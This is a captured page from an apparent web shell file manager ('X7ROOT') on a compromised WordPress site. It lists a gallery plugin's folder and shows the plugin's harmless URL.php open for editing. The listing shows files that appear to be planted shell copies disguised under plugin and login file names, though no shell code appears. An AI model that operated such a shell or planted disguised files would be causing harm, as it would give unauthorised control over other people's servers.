X7ROOT File Manager
Current Path:
/home/okeydcqc/okagallery.com/wp-content/plugins/nextgen-gallery/src/Util
home
/
okeydcqc
/
okagallery.com
/
wp-content
/
plugins
/
nextgen-gallery
/
src
/
Util
/
ðŸ“
..
📄
.htaccess
(356 B)
📄
Filesystem.php
(8.12 KB)
📄
Installer.php
(7.28 KB)
📄
Installer_Skin.php
(2.09 KB)
📄
Router.php
(18.46 KB)
📄
RoutingApp.php
(37.28 KB)
📄
Sanitization.php
(659 B)
📄
Security.php
(1.65 KB)
📄
Serializable.php
(2.23 KB)
📄
ThirdPartyCompatibility.php
(21.58 KB)
📄
Transient.php
(7.3 KB)
📄
URL.php
(1.18 KB)
📄
UsageTracking.php
(6.1 KB)
📄
about.php
(6.47 KB)
📄
about.php7
(6.47 KB)
📄
alfa-rex.php
(6.47 KB)
📄
alfa-rex.php56
(6.47 KB)
📄
alfa-rex.php7
(6.47 KB)
📄
alfa-rex.php8
(6.47 KB)
📄
wp-login.php
(6.47 KB)
Editing: URL.php
<?php namespace Imagely\NGG\Util; class URL { public static function get_source( $source_name ) { // Nonce checks are not necessary: nothing is happening here, only the mapping of string to variable. // // phpcs:disable WordPress.Security.NonceVerification.Recommended // phpcs:disable WordPress.Security.NonceVerification.Missing if ( 'request' === $source_name ) { return $_REQUEST; } elseif ( 'get' === $source_name ) { return $_GET; } elseif ( 'post' === $source_name ) { return $_POST; } elseif ( 'server' === $source_name ) { return $_SERVER; } // phpcs:enable WordPress.Security.NonceVerification.Recommended // phpcs:enable WordPress.Security.NonceVerification.Missing } public static function param( string $name, string $source = 'request', string $validation_method = 'sanitize_text_field' ) { if ( ! self::has_param( $name ) ) { return null; } $source = self::get_source( $source ); return $validation_method( wp_unslash( $source[ $name ] ) ); } public static function has_param( string $name, string $source = 'request' ): bool { $source = self::get_source( $source ); return isset( $source[ $name ] ); } }
Upload File
Create Folder